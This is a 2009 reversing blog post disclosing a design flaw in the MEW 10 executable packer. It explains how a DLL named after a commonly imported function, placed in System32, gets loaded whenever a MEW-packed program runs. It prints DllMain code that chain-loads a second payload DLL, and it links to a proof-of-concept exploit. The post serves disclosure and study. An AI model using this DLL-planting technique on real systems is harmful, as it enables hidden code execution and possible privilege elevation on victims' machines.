2009
09.14

Packer security advisory: MEW design flaw

Category: Reversing / Tag:  / Comments Off

This is a followup on MEW file format analysis. As mentioned in our video blog yesterday we noticed that MEW 10 has a design flaw that wrongfully passes function names to LoadLibraryA which firstly tries to load it as a DLL file and once that has failed it passes the same string to GetProcAddress and successfully finds selected function in previously loaded DLL. We can exploit this by creating a dummy DLL file named as a function which every file on Windows imports, for example ExitProcess or GetModuleHandleA. Placing such file in %Windows%\System32 would ensure that that file is loaded each time a MEW 10 packed file is executed on the system. But we have a problem we must resolve before we proceed. As said earlier function only gets found if the DLL isn't loaded, or more specifically call to LoadLibraryA returns NULL. This must be resolved because we don't want to crash the packed fie. So to work around this we simply do this inside our GetModuleHandleA.dll file:

BOOL APIENTRY DllMain(HMODULE hModule,
   DWORD  ul_reason_for_call, LPVOID lpReserved){
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		if(GetModuleHandleA("BadGuy.dll") == NULL){
			LoadLibraryA("BadGuy.dll");
			return false;
		}
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

Returning false at DLL_PROCESS_ATTACH makes Windows unload our GetModuleHandleA.dll but not before BadGuy.dll gets loaded. Simple code above ensures that our BadGuy.dll gets loaded only once (Windows also prevents this so this isn't really needed) since MEW 10 packed file can import GetModuleHandleA multiple times. Our BadGuy.dll only creates a new thread which displays a message box about it being successfully loaded. This could have been done with a single DLL file but we wanted to keep it short and simple.

There are many examples of design flaws in PE shell modifiers which could seriously threaten system security. Such example are not only limited to arbitrary code execution but could also lead to privilege elevation. We will continue to write about such shell modifier flaws in the future.

Download MEW 10 LoadLibrary exploit POC

VN:F [1.9.4_1102]
Rating: +4 (from 4 votes)
  • Share/Bookmark